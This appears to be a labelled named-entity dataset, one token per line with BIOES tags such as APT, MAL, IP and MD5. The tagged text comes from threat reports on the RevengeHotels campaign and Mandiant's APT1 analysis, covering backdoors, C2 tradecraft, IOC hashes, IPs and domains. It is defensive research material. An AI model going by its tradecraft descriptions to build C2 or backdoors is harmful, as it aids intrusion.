+that O
+this O
+attack O
+has O
+a O
+global O
+reach O
+. O
+
+Based O
+on O
+data O
+extracted O
+from O
+Bit.ly S-DOM
+statistics O
+, O
+we O
+can O
+see O
+that O
+potential O
+victims O
+from O
+many O
+other O
+countries O
+have O
+at O
+least O
+accessed O
+the O
+malicious O
+link O
+. O
+
+This O
+data O
+suggests O
+that O
+the O
+number O
+of O
+countries O
+with O
+potential O
+victims O
+is O
+higher O
+than O
+our O
+telemetry O
+has O
+registered O
+. O
+
+RevengeHotels S-APT
+is O
+a O
+campaign O
+that O
+has O
+been O
+active O
+since O
+at O
+least O
+2015 S-TIME
+, O
+revealing O
+different O
+groups O
+using O
+traditional O
+RAT S-MAL
+malware O
+to O
+infect O
+businesses O
+in O
+the O
+hospitality O
+sector O
+. O
+
+While O
+there O
+is O
+a O
+marked O
+interest O
+in O
+Brazilian O
+victims O
+, O
+our O
+telemetry O
+shows O
+that O
+their O
+reach O
+has O
+extended O
+to O
+other O
+countries O
+in O
+Latin B-LOC
+America E-LOC
+and O
+beyond O
+. O
+
+The O
+use O
+of O
+spear-phishing B-ACT
+emails E-ACT
+, O
+malicious O
+documents O
+and O
+RAT S-MAL
+malware O
+is O
+yielding O
+significant O
+results O
+for O
+at O
+least O
+two O
+groups O
+we O
+have O
+identified O
+in O
+this O
+campaign O
+. O
+
+Other O
+threat O
+actors O
+may O
+also O
+be O
+part O
+of O
+this O
+wave O
+of O
+attacks O
+, O
+though O
+there O
+is O
+no O
+confirmation O
+at O
+the O
+current O
+time O
+. O
+
+If O
+you O
+want O
+to O
+be O
+a O
+savvy O
+and O
+safe O
+traveler O
+, O
+it O
+’s O
+highly O
+recommended O
+to O
+use O
+a O
+virtual O
+payment O
+card O
+for O
+reservations O
+made O
+via O
+OTAs S-TOOL
+, O
+as O
+these O
+cards O
+normally O
+expire O
+after O
+one O
+charge O
+. O
+
+While O
+paying O
+for O
+your O
+reservation O
+or O
+checking O
+out O
+at O
+a O
+hotel O
+, O
+it O
+’s O
+a O
+good O
+idea O
+to O
+use O
+a O
+virtual O
+wallet O
+such O
+as O
+Apple B-TOOL
+Pay E-TOOL
+, O
+Google B-TOOL
+Pay E-TOOL
+, O
+etc O
+. O
+
+RevengeHotels S-APT
+: O
+74440d5d0e6ae9b9a03d06dd61718f66 S-MD5
+. O
+
+RevengeHotels S-APT
+: O
+e675bdf6557350a02f15c14f386fcc47 S-MD5
+. O
+
+RevengeHotels S-APT
+: O
+df632e25c32e8f8ad75ed3c50dd1cd47 S-MD5
+. O
+
+RevengeHotels S-APT
+: O
+a089efd7dd9180f9b726594bb6cf81ae S-MD5
+. O
+
+RevengeHotels S-APT
+: O
+81701c891a1766c51c74bcfaf285854b S-MD5
+. O
+
+APT1 S-APT
+. O
+
+Since O
+2004 S-TIME
+, O
+Mandiant S-SECTEAM
+has O
+investigated O
+computer O
+security O
+breaches O
+at O
+hundreds O
+of O
+organizations O
+around O
+the O
+world.The O
+majority O
+of O
+these O
+security O
+breaches O
+are O
+attributed O
+to O
+advanced O
+threat O
+actors O
+referred O
+to O
+as O
+the O
+“ O
+Advanced O
+Persistent O
+Threat O
+” O
+( O
+APT O
+) O
+. O
+
+We O
+first O
+published O
+details O
+about O
+the O
+APT O
+in O
+our O
+January B-TIME
+2010 E-TIME
+M-Trends S-IDTY
+report O
+. O
+
+As O
+we O
+stated O
+in O
+there O
+port O
+, O
+our O
+position O
+was O
+that O
+“ O
+The O
+Chinese O
+government O
+may O
+authorize O
+this O
+activity O
+, O
+but O
+there O
+’s O
+no O
+way O
+to O
+determine O
+the O
+extent O
+of O
+its O
+involvement. O
+” O
+Now O
+, O
+three O
+years O
+later O
+, O
+we O
+have O
+the O
+evidence O
+required O
+to O
+change O
+our O
+assessment O
+. O
+
+The O
+details O
+we O
+have O
+analyzed O
+during O
+hundreds O
+of O
+investigations O
+convince O
+us O
+that O
+the O
+groups O
+conducting O
+these O
+activities O
+are O
+based O
+primarily O
+in O
+China S-LOC
+and O
+that O
+the O
+Chinese O
+Government O
+is O
+aware O
+of O
+them O
+. O
+
+Mandiant S-SECTEAM
+continues O
+to O
+track O
+dozens O
+of O
+APT O
+groups O
+around O
+the O
+world O
+; O
+however O
+, O
+this O
+report O
+is O
+focused O
+on O
+the O
+most O
+prolific O
+of O
+these O
+groups O
+. O
+
+We O
+refer O
+to O
+this O
+group O
+as O
+“ O
+APT1 S-APT
+” O
+and O
+it O
+is O
+one O
+of O
+more O
+than O
+20 O
+APT O
+groups O
+with O
+origins O
+inChina S-LOC
+. O
+
+APT1 S-APT
+is O
+a O
+single O
+organization O
+of O
+operators O
+that O
+has O
+conducted O
+a O
+cyber B-ACT
+espionage E-ACT
+campaign O
+against O
+a O
+broad O
+range O
+of O
+victims O
+since O
+at O
+least O
+2006 S-TIME
+. O
+
+From O
+our O
+observations O
+, O
+it O
+is O
+one O
+of O
+the O
+most O
+prolific O
+cyber B-ACT
+espionage E-ACT
+groups O
+in O
+terms O
+of O
+the O
+sheer O
+quantity O
+of O
+information O
+stolen O
+. O
+
+The O
+scale O
+and O
+impact O
+of O
+APT1 S-APT
+’s O
+operations O
+compelled O
+us O
+to O
+write O
+this O
+report O
+. O
+
+The O
+activity O
+we O
+have O
+directly O
+observed O
+likely O
+represents O
+only O
+a O
+small O
+fraction O
+of O
+the O
+cyber B-ACT
+espionage E-ACT
+that O
+APT1 S-APT
+has O
+conducted O
+. O
+
+Though O
+our O
+visibility O
+of O
+APT1 S-APT
+’s O
+activities O
+is O
+incomplete O
+, O
+we O
+have O
+analyzed O
+the O
+group O
+’s O
+intrusions O
+against O
+nearly O
+150 O
+victims O
+over O
+seven O
+years O
+. O
+
+From O
+our O
+unique O
+vantage O
+point O
+responding O
+to O
+victims O
+, O
+we O
+tracked O
+APT1 S-APT
+back O
+to O
+four O
+large O
+networks O
+in O
+Shanghai S-LOC
+, O
+two O
+of O
+which O
+are O
+allocated O
+directly O
+to O
+the O
+Pudong B-LOC
+New I-LOC
+Area E-LOC
+. O
+
+We O
+uncovered O
+a O
+substantial O
+amount O
+of O
+APT1 S-APT
+’s O
+attack O
+infrastructure O
+, O
+command O
+and O
+control O
+, O
+and O
+modus O
+operandi O
+( O
+tools O
+, O
+tactics O
+, O
+and O
+procedures O
+) O
+. O
+
+In O
+an O
+effort O
+to O
+underscore O
+there O
+are O
+actual O
+individuals O
+behind O
+the O
+keyboard O
+, O
+Mandiant S-SECTEAM
+is O
+revealing O
+three O
+personas O
+we O
+have O
+attributed O
+to O
+APT1 S-APT
+. O
+
+These O
+operators O
+, O
+like O
+soldiers O
+, O
+may O
+merely O
+be O
+following O
+orders O
+given O
+to O
+them O
+by O
+others O
+. O
+
+Our O
+analysis O
+has O
+led O
+us O
+to O
+conclude O
+that O
+APT1 S-APT
+is O
+likely O
+government-sponsored O
+and O
+one O
+of O
+the O
+most O
+persistent O
+of O
+China S-LOC
+’s O
+cyber O
+threat O
+actors O
+. O
+
+We O
+believe O
+that O
+APT1 S-APT
+is O
+able O
+to O
+wage O
+such O
+a O
+long-running O
+and O
+extensive O
+cyber B-ACT
+espionage E-ACT
+campaign O
+in O
+large O
+part O
+because O
+it O
+receives O
+direct O
+government O
+support O
+. O
+
+In O
+seeking O
+to O
+identify O
+the O
+organization O
+behind O
+this O
+activity O
+,our O
+research O
+found O
+that O
+People B-IDTY
+’s I-IDTY
+Liberation I-IDTY
+Army E-IDTY
+( O
+PLA S-IDTY
+’s O
+) O
+Unit B-IDTY
+61398 E-IDTY
+is O
+similar O
+to O
+APT1 S-APT
+in O
+its O
+mission O
+, O
+capabilities O
+, O
+and O
+resources O
+. O
+
+PLA S-IDTY
+Unit B-IDTY
+61398 E-IDTY
+is O
+also O
+located O
+in O
+precisely O
+the O
+same O
+area O
+from O
+which O
+APT1 S-APT
+activity O
+appears O
+to O
+originate O
+. O
+
+APT1 S-APT
+is O
+believed O
+to O
+be O
+the O
+2nd O
+Bureau B-IDTY
+of I-IDTY
+the I-IDTY
+People I-IDTY
+’s I-IDTY
+Liberation I-IDTY
+Army E-IDTY
+( O
+PLA S-IDTY
+) O
+General B-IDTY
+Staff I-IDTY
+Department E-IDTY
+’s O
+( O
+GSD S-IDTY
+) O
+3rd O
+Department O
+, O
+which O
+is O
+most O
+commonly O
+known O
+by O
+its O
+Military B-IDTY
+Unit I-IDTY
+Cover I-IDTY
+Designator E-IDTY
+( O
+MUCD S-IDTY
+) O
+as O
+Unit B-IDTY
+61398 E-IDTY
+. O
+
+The O
+nature O
+of O
+“ O
+Unit B-IDTY
+61398 E-IDTY
+’s O
+” O
+work O
+is O
+considered O
+by O
+China S-LOC
+to O
+be O
+a O
+state O
+secret O
+; O
+however O
+, O
+we O
+believe O
+it O
+engages O
+in O
+harmful O
+“ O
+Computer O
+Network O
+Operations. O
+” O
+Unit B-IDTY
+61398 E-IDTY
+is O
+partially O
+situated O
+on O
+Datong B-LOC
+Road E-LOC
+in O
+Gaoqiaozhen S-LOC
+, O
+which O
+is O
+located O
+in O
+the O
+Pudong B-LOC
+New I-LOC
+Area E-LOC
+of O
+Shanghai S-LOC
+. O
+
+The O
+central O
+building O
+in O
+this O
+compound O
+is O
+a O
+130,663 O
+square O
+foot O
+facility O
+that O
+is O
+12 O
+stories O
+high O
+and O
+was O
+built O
+in O
+early O
+2007 S-TIME
+. O
+
+APT1 S-APT
+has O
+systematically O
+stolen O
+hundreds O
+of O
+terabytes O
+of O
+data O
+from O
+at O
+least O
+141 O
+organizations O
+, O
+and O
+has O
+demonstrated O
+the O
+capability O
+and O
+intent O
+to O
+steal O
+from O
+dozens O
+of O
+organizations O
+simultaneously O
+. O
+
+Since O
+2006 S-TIME
+, O
+Mandiant S-SECTEAM
+has O
+observed O
+APT1 S-APT
+compromise O
+141 O
+companies O
+spanning O
+20 O
+major O
+industries O
+. O
+
+APT1 S-APT
+has O
+a O
+well-defined O
+attack O
+methodology O
+, O
+honed O
+over O
+years O
+and O
+designed O
+to O
+steal O
+large O
+volumes O
+of O
+valuable O
+intellectual O
+property O
+. O
+
+Once O
+APT1 S-APT
+has O
+established O
+access O
+, O
+they O
+periodically O
+revisit O
+the O
+victim O
+’s O
+network O
+over O
+several O
+months O
+or O
+years O
+and O
+steal O
+broad O
+categories O
+of O
+intellectual O
+property O
+, O
+including O
+technology O
+blueprints O
+, O
+proprietary O
+manufacturing O
+processes O
+, O
+test O
+results O
+, O
+business O
+plans O
+, O
+pricing O
+documents O
+, O
+partnership O
+agreements O
+, O
+and O
+emails S-TOOL
+and O
+contact O
+lists O
+from O
+victim O
+organizations O
+’ O
+leadership O
+. O
+
+APT1 S-APT
+uses O
+some O
+tools O
+and O
+techniques O
+that O
+we O
+have O
+not O
+yet O
+observed O
+being O
+used O
+by O
+other O
+groups O
+including O
+two O
+utilities O
+designed O
+to O
+steal O
+email S-TOOL
+— O
+GETMAIL S-MAL
+and O
+MAPIGET S-MAL
+. O
+
+Establishing O
+a O
+foothold O
+involves O
+actions O
+that O
+ensure O
+control O
+of O
+the O
+target O
+network O
+’s O
+systems O
+from O
+outside O
+the O
+network O
+. O
+
+APT1 S-APT
+establishes O
+a O
+foothold O
+once O
+email S-TOOL
+recipients O
+open O
+a O
+malicious O
+file O
+and O
+a O
+backdoor O
+is O
+subsequently O
+installed O
+. O
+
+A O
+backdoor O
+is O
+software O
+that O
+allows O
+an O
+intruder O
+to O
+send O
+commands O
+to O
+the O
+system O
+remotely O
+. O
+
+In O
+almost O
+every O
+case O
+, O
+APT O
+backdoors O
+initiate O
+outbound O
+connections O
+to O
+the O
+intruder O
+’s O
+“ O
+command O
+and O
+control O
+” O
+( O
+C2 S-TOOL
+) O
+server O
+. O
+
+APT O
+intruders O
+employ O
+this O
+tactic O
+because O
+while O
+network O
+firewalls O
+are O
+generally O
+adept O
+at O
+keeping O
+malware O
+outside O
+the O
+network O
+from O
+initiating O
+communication O
+with O
+systems O
+inside O
+the O
+network O
+, O
+they O
+are O
+less O
+reliable O
+at O
+keeping O
+malware O
+that O
+is O
+already O
+inside O
+the O
+network O
+from O
+communicating O
+to O
+systems O
+outside O
+. O
+
+While O
+APT1 S-APT
+intruders O
+occasionally O
+use O
+publicly O
+available O
+backdoors O
+such O
+as O
+Poison B-MAL
+Ivy E-MAL
+and O
+Gh0st B-MAL
+RAT E-MAL
+, O
+the O
+vast O
+majority O
+of O
+the O
+time O
+they O
+use O
+what O
+appear O
+to O
+be O
+their O
+own O
+custom O
+backdoors O
+. O
+
+We O
+will O
+describe O
+APT1 S-APT
+’s O
+backdoors O
+in O
+two O
+categories O
+: O
+“ O
+Beachhead O
+Backdoors O
+” O
+and O
+“ O
+Standard O
+Backdoors. O
+” O
+
+Beachhead O
+backdoors O
+are O
+typically O
+minimally O
+featured O
+. O
+
+They O
+offer O
+the O
+attacker O
+a O
+toe-hold O
+to O
+perform O
+simple O
+tasks O
+like O
+retrieve O
+files O
+, O
+gather O
+basic O
+system O
+information O
+and O
+trigger O
+the O
+execution O
+of O
+other O
+more O
+significant O
+capabilities O
+such O
+as O
+a O
+standard O
+backdoor O
+. O
+
+APT1 S-APT
+’s O
+beachhead O
+backdoors O
+are O
+usually O
+what O
+we O
+call O
+WEBC2 B-MAL
+backdoors E-MAL
+. O
+
+WEBC2 B-MAL
+backdoors E-MAL
+are O
+probably O
+the O
+most O
+well-known O
+kind O
+of O
+APT1 S-APT
+backdoor O
+, O
+and O
+are O
+the O
+reason O
+why O
+some O
+security O
+companies O
+refer O
+to O
+APT1 S-APT
+as O
+the O
+“ O
+Comment O
+Crew. O
+” O
+A O
+WEBC2 B-MAL
+backdoor E-MAL
+is O
+designed O
+to O
+retrieve O
+a O
+webpage O
+from O
+a O
+C2 S-TOOL
+server O
+. O
+
+It O
+expects O
+the O
+webpage O
+to O
+contain O
+special O
+HTML S-TOOL
+tags O
+; O
+the O
+backdoor O
+will O
+attempt O
+to O
+interpret O
+the O
+data O
+between O
+the O
+tags O
+as O
+commands O
+. O
+
+Older O
+versions O
+of O
+WEBC2 S-MAL
+read O
+data O
+between O
+HTML S-TOOL
+comments O
+, O
+though O
+over O
+time O
+WEBC2 S-MAL
+variants O
+have O
+evolved O
+to O
+read O
+data O
+contained O
+within O
+other O
+types O
+of O
+tags O
+. O
+
+From O
+direct O
+observation O
+, O
+we O
+can O
+confirm O
+that O
+APT1 S-APT
+was O
+using O
+WEBC2 B-MAL
+backdoors E-MAL
+as O
+early O
+as O
+July B-TIME
+2006 E-TIME
+. O
+
+However O
+, O
+the O
+first O
+compile O
+time35 O
+we O
+have O
+for O
+WEBC2 S-MAL
+is O
+2004-01-23 S-TIME
+, O
+suggesting O
+that O
+APT1 S-APT
+has O
+been O
+crafting O
+WEBC2 B-MAL
+backdoors E-MAL
+since O
+early O
+2004 S-TIME
+. O
+
+Based O
+on O
+the O
+400+ O
+samples O
+of O
+WEBC2 S-MAL
+variants O
+that O
+we O
+have O
+accumulated O
+, O
+it O
+appears O
+that O
+APT1 S-APT
+has O
+direct O
+access O
+to O
+developers O
+who O
+have O
+continually O
+released O
+new O
+WEBC2 S-MAL
+variants O
+for O
+over O
+six O
+years O
+. O
+
+WEBC2 B-MAL
+backdoors E-MAL
+are O
+often O
+packaged O
+with O
+spear B-ACT
+phishing E-ACT
+emails S-TOOL
+. O
+
+Once O
+installed O
+, O
+APT1 S-APT
+intruders O
+have O
+the O
+option O
+to O
+tell O
+victim O
+systems O
+to O
+download O
+and O
+execute O
+additional O
+malicious O
+software O
+of O
+their O
+choice O
+. O
+
+WEBC2 B-MAL
+backdoors E-MAL
+work O
+for O
+their O
+intended O
+purpose O
+, O
+but O
+they O
+generally O
+have O
+fewer O
+features O
+than O
+the O
+“ O
+Standard O
+Backdoors O
+” O
+described O
+below O
+. O
+
+The O
+standard O
+, O
+non-WEBC2 S-MAL
+APT1 S-APT
+backdoor O
+typically O
+communicates O
+using O
+the O
+HTTP S-PROT
+protocol O
+( O
+to O
+blend O
+in O
+with O
+legitimate O
+web O
+traffic O
+) O
+or O
+a O
+custom O
+protocol O
+that O
+the O
+malware O
+authors O
+designed O
+themselves O
+. O
+
+These O
+backdoors O
+give O
+APT O
+intruders O
+a O
+laundry O
+list O
+of O
+ways O
+to O
+control O
+victim O
+systems O
+. O
+
+The O
+BISCUIT B-MAL
+backdoor E-MAL
+( O
+so O
+named O
+for O
+the O
+command O
+“ O
+bdkzt S-MAL
+” O
+) O
+is O
+an O
+illustrative O
+example O
+of O
+the O
+range O
+of O
+commands O
+that O
+APT1 S-APT
+has O
+built O
+into O
+its O
+“ O
+standard O
+” O
+backdoors O
+. O
+
+APT1 S-APT
+has O
+used O
+and O
+steadily O
+modified O
+BISCUIT S-MAL
+since O
+as O
+early O
+as O
+2007 O
+and O
+continues O
+to O
+use O
+it O
+presently O
+. O
+
+Some O
+APT O
+backdoors O
+attempt O
+to O
+mimic O
+legitimate O
+Internet O
+traffic O
+other O
+than O
+the O
+HTTP S-PROT
+protocol O
+. O
+
+When O
+network O
+defenders O
+see O
+the O
+communications O
+between O
+these O
+backdoors O
+and O
+their O
+C2 S-TOOL
+servers O
+, O
+they O
+might O
+easily O
+dismiss O
+them O
+as O
+legitimate O
+network O
+traffic O
+. O
+
+
+APT1 S-APT
+. O
+
+APT1 S-APT
+maintains O
+an O
+extensive O
+infrastructure O
+of O
+computers O
+around O
+the O
+world O
+. O
+
+We O
+have O
+evidence O
+suggesting O
+that O
+APT1 S-APT
+manually O
+controls O
+thousands O
+of O
+systems O
+in O
+support O
+of O
+their O
+attacks O
+, O
+and O
+have O
+directly O
+observed O
+their O
+control O
+over O
+hundreds O
+of O
+these O
+systems O
+. O
+
+Although O
+they O
+control O
+systems O
+in O
+dozens O
+of O
+countries O
+, O
+their O
+attacks O
+originate O
+from O
+four O
+large O
+networks O
+in O
+Shanghai S-LOC
+— O
+two O
+of O
+which O
+are O
+allocated O
+directly O
+to O
+the O
+Pudong B-LOC
+New I-LOC
+Area E-LOC
+, O
+the O
+home O
+of O
+Unit B-IDTY
+61398 E-IDTY
+. O
+
+The O
+sheer O
+number O
+of O
+APT1 S-APT
+IP O
+addresses O
+concentrated O
+in O
+these O
+Shanghai S-LOC
+ranges O
+, O
+coupled O
+with O
+Simplified B-TOOL
+Chinese I-TOOL
+keyboard E-TOOL
+layout O
+settings O
+on O
+APT1 S-APT
+’s O
+attack O
+systems O
+, O
+betrays O
+the O
+true O
+location O
+and O
+language O
+of O
+the O
+operators O
+. O
+
+To O
+help O
+manage O
+the O
+vast O
+number O
+of O
+systems O
+they O
+control O
+, O
+APT1 S-APT
+has O
+registered O
+hundreds O
+of O
+domain O
+names O
+, O
+the O
+majority O
+of O
+which O
+also O
+point O
+to O
+a O
+Shanghai S-LOC
+locale O
+. O
+
+The O
+domain O
+names O
+and O
+IP O
+addresses O
+together O
+comprise O
+APT1 S-APT
+’s O
+command B-TOOL
+and I-TOOL
+control E-TOOL
+framework O
+which O
+they O
+manage O
+in O
+concert O
+to O
+camouflage O
+their O
+true O
+origin O
+from O
+their O
+English O
+speaking O
+targets O
+. O
+
+As O
+covered O
+in O
+the O
+previous O
+“ O
+Attack O
+Lifecycle O
+” O
+section O
+, O
+WEBC2 B-MAL
+backdoor E-MAL
+variants O
+download O
+and O
+interpret O
+data O
+stored O
+between O
+tags O
+in O
+HTML S-TOOL
+pages O
+as O
+commands O
+. O
+
+They O
+usually O
+download O
+HTML S-TOOL
+pages O
+from O
+a O
+system O
+within O
+APT1 S-APT
+’s O
+hop O
+infrastructure O
+. O
+
+We O
+have O
+observed O
+APT1 S-APT
+intruders O
+logging O
+in O
+to O
+WEBC2 S-MAL
+servers O
+and O
+manually O
+editing O
+the O
+HTML S-TOOL
+pages O
+that O
+backdoors O
+will O
+download O
+. O
+
+Because O
+the O
+commands O
+are O
+usually O
+encoded O
+and O
+difficult O
+to O
+spell O
+from O
+memory O
+, O
+APT1 S-APT
+intruders O
+typically O
+do O
+not O
+type O
+these O
+strings O
+, O
+but O
+instead O
+copy O
+and O
+paste O
+them O
+into O
+the O
+HTML S-TOOL
+files O
+. O
+
+They O
+likely O
+generate O
+the O
+encoded O
+commands O
+on O
+their O
+own O
+systems O
+before O
+pasting O
+them O
+in O
+to O
+an O
+HTML S-TOOL
+file O
+hosted O
+by O
+the O
+hop O
+point O
+. O
+
+For O
+example O
+, O
+we O
+observed O
+an O
+APT O
+attacker O
+pasting O
+the O
+string O
+“ O
+czo1NA== O
+” O
+into O
+an O
+HTML S-TOOL
+page O
+. O
+
+That O
+string O
+is O
+the O
+base64 S-ENCR
+encoded O
+version O
+of O
+“ O
+s O
+: O
+54 O
+” O
+, O
+meaning O
+“ O
+sleep O
+for O
+54 O
+minutes O
+” O
+( O
+or O
+hours O
+, O
+depending O
+on O
+the O
+particular O
+backdoor O
+) O
+. O
+
+In O
+lieu O
+of O
+manually O
+editing O
+an O
+HTML S-TOOL
+file O
+on O
+a O
+hop O
+point O
+, O
+we O
+have O
+also O
+observed O
+APT1 S-APT
+intruders O
+uploading O
+new O
+( O
+already-edited O
+) O
+HTML S-TOOL
+files O
+. O
+
+When O
+APT1 S-APT
+attackers O
+are O
+not O
+using O
+WEBC2 S-MAL
+, O
+they O
+require O
+a O
+“ O
+command B-TOOL
+and I-TOOL
+control E-TOOL
+” O
+( O
+C2 S-TOOL
+) O
+user O
+interface O
+so O
+they O
+can O
+issue O
+commands O
+to O
+the O
+backdoor O
+. O
+
+This O
+interface O
+sometimes O
+runs O
+on O
+their O
+personal O
+attack O
+system O
+, O
+which O
+is O
+typically O
+in O
+Shanghai S-LOC
+. O
+
+In O
+these O
+instances O
+, O
+when O
+a O
+victim O
+backdoor O
+makes O
+contact O
+with O
+a O
+hop O
+, O
+the O
+communications O
+need O
+to O
+be O
+forwarded O
+from O
+the O
+hop O
+to O
+the O
+intruder O
+’s O
+Shanghai S-LOC
+system O
+so O
+the O
+backdoor O
+can O
+talk O
+to O
+the O
+C2 S-TOOL
+server O
+software O
+. O
+
+We O
+have O
+observed O
+767 O
+separate O
+instances O
+in O
+which O
+APT1 S-APT
+intruders O
+used O
+the O
+publicly O
+available O
+“ O
+HUC B-TOOL
+Packet I-TOOL
+Transmit I-TOOL
+Tool E-TOOL
+” O
+or O
+HTRAN S-TOOL
+on O
+a O
+hop O
+. O
+
+As O
+always O
+, O
+keep O
+in O
+mind O
+that O
+these O
+uses O
+are O
+confirmed O
+uses O
+, O
+and O
+likely O
+represent O
+only O
+a O
+small O
+fraction O
+of O
+APT1 S-APT
+’s O
+total O
+activity O
+. O
+
+The O
+HTRAN S-TOOL
+utility O
+is O
+merely O
+a O
+middle-man O
+, O
+facilitating O
+connections O
+between O
+the O
+victim O
+and O
+the O
+attacker O
+who O
+is O
+using O
+the O
+hop O
+point O
+. O
+
+Typical O
+use O
+of O
+HTRAN S-TOOL
+is O
+fairly O
+simple O
+: O
+the O
+attacker O
+must O
+specify O
+the O
+originating O
+IP O
+address O
+( O
+of O
+his O
+or O
+her O
+workstation O
+in O
+Shanghai S-LOC
+) O
+, O
+and O
+a O
+port O
+on O
+which O
+to O
+accept O
+connections O
+. O
+
+For O
+example O
+, O
+the O
+following O
+command O
+, O
+which O
+was O
+issued O
+by O
+an O
+APT1 S-APT
+actor O
+, O
+will O
+listen O
+for O
+incoming O
+connections O
+on O
+port O
+443 O
+on O
+the O
+hop O
+and O
+automatically O
+proxy O
+them O
+to O
+the O
+Shanghai S-LOC
+IP O
+address O
+58.247.242.254 S-IP
+on O
+port O
+443 O
+. O
+
+Occasionally O
+, O
+APT1 S-APT
+attackers O
+have O
+installed O
+C2 S-TOOL
+server O
+components O
+on O
+systems O
+in O
+their O
+hop O
+infrastructure O
+rather O
+than O
+forwarding O
+connections O
+back O
+to O
+C2 S-TOOL
+servers O
+in O
+Shanghai S-LOC
+. O
+
+In O
+these O
+instances O
+they O
+do O
+not O
+need O
+to O
+use O
+a O
+proxy O
+tool O
+like O
+HTRAN S-TOOL
+to O
+interact O
+with O
+victim O
+systems O
+. O
+
+However O
+, O
+it O
+does O
+mean O
+that O
+the O
+intruders O
+need O
+to O
+be O
+able O
+to O
+interface O
+with O
+the O
+( O
+often O
+graphical O
+) O
+C2 S-TOOL
+server O
+software O
+running O
+on O
+the O
+hop O
+. O
+
+We O
+have O
+observed O
+APT1 S-APT
+intruders O
+log O
+in O
+to O
+their O
+hop O
+point O
+, O
+start O
+the O
+C2 S-TOOL
+server O
+, O
+wait O
+for O
+incoming O
+connections O
+, O
+and O
+then O
+proceed O
+to O
+give O
+commands O
+to O
+victim O
+systems O
+. O
+
+WEBC2 S-MAL
+variants O
+may O
+include O
+a O
+server O
+component O
+that O
+provides O
+a O
+simple O
+C2 S-TOOL
+interface O
+to O
+the O
+intruder O
+. O
+
+This O
+saves O
+the O
+intruder O
+from O
+having O
+to O
+manually O
+edit O
+webpages O
+. O
+
+That O
+is O
+, O
+this O
+server O
+component O
+receives O
+connections O
+from O
+victim O
+backdoors O
+, O
+displays O
+them O
+to O
+the O
+intruder O
+, O
+and O
+then O
+translates O
+the O
+intruder O
+’s O
+commands O
+into O
+HTML S-TOOL
+tags O
+that O
+the O
+victim O
+backdoors O
+read O
+. O
+
+In O
+the O
+last O
+two O
+years O
+alone O
+, O
+we O
+have O
+confirmed O
+937 O
+APT1 S-APT
+C2 S-TOOL
+servers O
+— O
+that O
+is O
+, O
+actively O
+listening O
+or O
+communicating O
+programs O
+— O
+running O
+on O
+849 O
+distinct O
+IP O
+addresses O
+. O
+
+However O
+, O
+we O
+have O
+evidence O
+to O
+suggest O
+that O
+APT1 S-APT
+is O
+running O
+hundreds O
+, O
+and O
+likely O
+thousands O
+, O
+of O
+other O
+servers O
+( O
+see O
+the O
+Domains O
+section O
+below O
+) O
+. O
+
+The O
+programs O
+acting O
+as O
+APT1 S-APT
+servers O
+have O
+mainly O
+been O
+: O
+FTP S-PROT
+, O
+for O
+transferring O
+files O
+; O
+web O
+, O
+primarily O
+for O
+WEBC2 S-MAL
+; O
+RDP S-PROT
+, O
+for O
+remote O
+graphical O
+control O
+of O
+a O
+system O
+; O
+HTRAN S-TOOL
+, O
+for O
+proxying O
+; O
+and O
+C2 S-TOOL
+servers O
+associated O
+with O
+various O
+backdoor O
+families O
+. O
+
+The O
+Domain B-PROT
+Name I-PROT
+System E-PROT
+( O
+DNS S-PROT
+) O
+is O
+the O
+phone O
+book O
+of O
+the O
+Internet O
+. O
+
+In O
+the O
+same O
+way O
+that O
+people O
+program O
+named O
+contacts O
+into O
+their O
+cell O
+phones O
+and O
+no O
+longer O
+need O
+to O
+remember O
+phone O
+numbers O
+, O
+DNS S-PROT
+allows O
+people O
+to O
+remember O
+names O
+like O
+“ O
+google.com S-DOM
+” O
+instead O
+of O
+IP O
+addresses O
+. O
+
+When O
+a O
+person O
+types O
+“ O
+google.com S-DOM
+” O
+into O
+a O
+web O
+browser O
+, O
+a O
+DNS S-PROT
+translation O
+to O
+an O
+IP O
+address O
+occurs O
+so O
+that O
+the O
+person O
+’s O
+computer O
+can O
+communicate O
+with O
+Google S-IDTY
+. O
+
+Names O
+that O
+can O
+be O
+translated O
+through O
+DNS S-PROT
+to O
+IP O
+addresses O
+are O
+referred O
+to O
+as O
+Fully B-TOOL
+Qualified I-TOOL
+Domain I-TOOL
+Names E-TOOL
+( O
+FQDNs S-TOOL
+) O
+. O
+
+A O
+DNS S-PROT
+zone O
+represents O
+a O
+collection O
+of O
+FQDNs S-TOOL
+that O
+end O
+with O
+the O
+same O
+name O
+, O
+and O
+which O
+are O
+usually O
+registered O
+through O
+a O
+domain O
+registration O
+company O
+and O
+controlled O
+by O
+a O
+single O
+owner O
+. O
+
+For O
+example O
+, O
+“ O
+hugesoft.org S-DOM
+” O
+is O
+an O
+FQDN S-TOOL
+but O
+also O
+represents O
+a O
+zone O
+. O
+
+The O
+FQDNs S-TOOL
+“ O
+ug-co.hugesoft.org S-DOM
+” O
+and O
+“ O
+7cback.hugesoft.org S-DOM
+” O
+are O
+part O
+of O
+the O
+“ O
+hugesoft.org S-DOM
+” O
+zone O
+and O
+are O
+called O
+“ O
+subdomains O
+” O
+of O
+the O
+zone O
+. O
+
+The O
+person O
+who O
+registered O
+“ O
+hugesoft.org S-DOM
+” O
+may O
+add O
+as O
+many O
+subdomains O
+as O
+they O
+wish O
+and O
+controls O
+the O
+IP O
+resolutions O
+of O
+these O
+FQDNs S-TOOL
+. O
+
+APT1 S-APT
+has O
+registered O
+at O
+least O
+107 O
+zones O
+since O
+2004 S-TIME
+. O
+
+Within O
+these O
+zones O
+, O
+we O
+know O
+of O
+thousands O
+of O
+FQDNs S-TOOL
+that O
+have O
+resolved O
+to O
+hundreds O
+of O
+IP O
+addresses O
+( O
+which O
+we O
+suspect O
+are O
+hops O
+) O
+and O
+in O
+some O
+instances O
+to O
+APT1 S-APT
+’s O
+source O
+IP O
+addresses O
+in O
+Shanghai S-LOC
+. O
+
+The O
+first O
+zone O
+we O
+became O
+aware O
+of O
+was O
+“ O
+hugesoft.org S-DOM
+” O
+, O
+which O
+was O
+registered O
+through O
+eNom O
+, O
+Inc. O
+in O
+October B-TIME
+2004 E-TIME
+. O
+
+The O
+registrant O
+supplied O
+“ O
+uglygorilla@163.com S-EMAIL
+” O
+as O
+an O
+email S-TOOL
+address O
+. O
+
+The O
+supplied O
+registration O
+information O
+, O
+which O
+is O
+still O
+visible O
+in O
+public O
+“ O
+whois S-TOOL
+” O
+data O
+as O
+of O
+February B-TIME
+3, I-TIME
+2013 E-TIME
+. O
+
+The O
+supplied O
+registrant O
+information O
+does O
+not O
+need O
+to O
+be O
+accurate O
+for O
+the O
+zone O
+to O
+be O
+registered O
+successfully O
+. O
+
+For O
+example O
+, O
